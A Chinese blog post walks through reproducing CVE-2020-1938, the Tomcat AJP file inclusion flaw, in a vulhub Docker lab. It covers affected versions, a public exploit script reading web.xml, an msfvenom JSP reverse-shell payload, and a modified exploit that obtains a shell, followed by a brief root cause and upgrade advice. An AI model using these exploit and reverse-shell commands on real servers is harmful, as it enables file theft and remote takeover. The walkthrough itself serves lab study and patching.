-
CVE-2020-1938 Tomcat远程文件包含漏洞
漏洞简介
CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
影响版本
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
漏洞复现
/vulhub/tomcat/CVE-2020-1938 docker-compose up -d- 1
- 2
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.47.129 -p 8009 -f /WEB-INF/web.xml- 1
- 2
读取到web.xml,漏洞复现成功
漏洞利用
如果服务器上本身具有木马程序,则访问时加入后缀.jsp即可进行远程命令执行
首先生成java木马文件msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=攻击机开放的端口号 -f raw > aini_shell.txt- 1
将其复制到服务器,模拟这个web应用有个文件上传漏洞,并且成功利用了docker cp aini_shell.txt 4b364a8851f8:/usr/local/tomcat/webapps/ROOT/WEB-INF/- 1
使用修改后的exp访问java木马python2 rce.py 127.0.0.1 -p 8009 -f /WEB-INF/aini_shell.txt- 1
攻击机成功getshell
漏洞原理
找到tomcat 9.0.30的源码
https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.30/org.apache.coyote.ajp.AjpProcessor类中,tomcat对ajp传递来的数据的处理方式存在问题,导致用户可以控制:
“javax.servlet.include.request_uri”
“javax.servlet.include.path_info”
“javax.servlet.include.servlet_path”
根据获得的路径获取资源
或提交给jspservelet进行执行
修复建议
升级版本
-
相关阅读:
俩个不同对象的List获取交集通过属性来判断,JDK8Stream的使用
什么是地理信息系统(GIS)?
猿创征文 第二季| #「笔耕不辍」--生命不息,写作不止#
计算机毕业设计Java公立医院绩效考核系统(源码+系统+mysql数据库+Lw文档)
如何利用ChatGPT撰写学术论文?
自己写一个定时备份 mysql 的备份工具
【高级渗透篇】网络安全面试
如何通过数据治理来提升业务价值——业务场景治理
超级签名封号掉签该怎么办
Linux:GNU/Linux、BSD、自由软件、GPL、glibc词义说明
- 原文地址:https://blog.csdn.net/mirocky/article/details/133810599